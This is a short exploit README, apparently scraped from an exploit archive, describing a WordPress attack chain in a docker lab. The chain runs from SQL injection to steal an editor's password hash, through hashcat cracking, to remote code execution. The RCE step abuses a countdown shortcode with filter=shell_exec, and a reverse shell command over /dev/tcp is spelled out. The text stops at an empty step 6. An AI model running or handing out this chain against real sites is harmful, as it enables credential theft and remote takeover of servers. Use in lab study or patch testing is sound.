## https://sploitus.com/exploit?id=DD8942C8-640E-5EBF-AD31-277A1F21F990
# CVE Session 1
## How to Run exploit
### 1. Build the docker image
```bash
docker-compose up -d --build
```
Now You can confirm you have access to the WordPress server at: http://localhost:8080
### 2. Run the script to get editor's credential by SQLi
Assuming that we are in the Linux OS.
```bash
./script.sh
```
### 3. Run hashcat to crack the hash
```bash
# create target_hash.txt
echo $extracted_hash > target_hash.txt
# hashcrack
hashcat -m 400 target_hash.txt Pwdb_top-1000.txt
```
### 4. Login to the WordPress Server as "editor"
* **Username:** `Mike`
* **Email:** `mike@example.com`
* **Password:** `test123`
* **Role:** `Editor`
### 5. Create a new post with shortcode
reverse shell
base64 encode this! -> bash -i >& /dev/tcp/$RIP/4444 0>&1
```wordpress
[countdown date=2025/12/31 filter=shell_exec]echo | base64 -d | /usr/bin/bash[/countdown]
```
### 6.